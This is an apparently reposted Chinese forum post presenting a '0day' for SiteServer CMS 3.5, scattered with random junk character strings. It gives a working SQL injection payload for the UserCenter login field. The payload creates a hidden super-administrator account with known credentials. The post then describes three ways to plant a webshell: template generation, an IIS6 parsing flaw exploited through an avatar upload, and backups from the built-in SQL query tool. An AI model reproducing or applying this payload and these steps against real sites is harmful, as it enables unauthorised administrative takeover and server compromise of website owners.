SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
, `$ p+ C1 F$ i
stieserver官网:www.siteserver.cn
; L* P, i) E; _9 G, N# ]


3 ^' p3 Y3 w1 q1 e3 F' ]EXP:

直接访问UserCenter/login.aspx
- {5 P) o7 V. Z1 A
, ~& h" e' }$ L* B

用户名处输入：
" G5 u, H- f4 H) w
  ?8 V3 m# S! A. Y123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
6 n9 s; d/ @. c. J1 N


' Q$ o* p1 k  y8 O; \密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

% F# ~* y5 N$ z
$ P( c4 N, K! |4 \4 z! b& ~
之后再访问后台SiteServer/login.aspx用插入的用户登陆

) t$ W: |5 K- M, f9 j. i
$ a0 P1 m4 [  b, b' T8 I$ T8 `
8 e) D' M% J3 y; V# }: ~后台拿webshell的三种方法：
% W- f$ {6 N# |6 N; I
* E( A4 e: `0 J一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
" T5 ?9 B$ ~2 W! t! y
二、

成员权限-》添加用户-》用户名为：1.asp
4 g! z3 p) `1 R, t9 \7 a: ?
http://127.0.0.1/usercenter/
" b! C  b5 R5 F% W
: v; \) K1 b# K0 v( C用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

9 L+ H! ?3 k8 y0 s  \三、

系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

, ]0 p7 A! J3 b( [系统工具-》数据库工具-》SQL语句查询
. s) w; Z3 v, ^( i这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

; z% @1 p( k! V0 w" \- s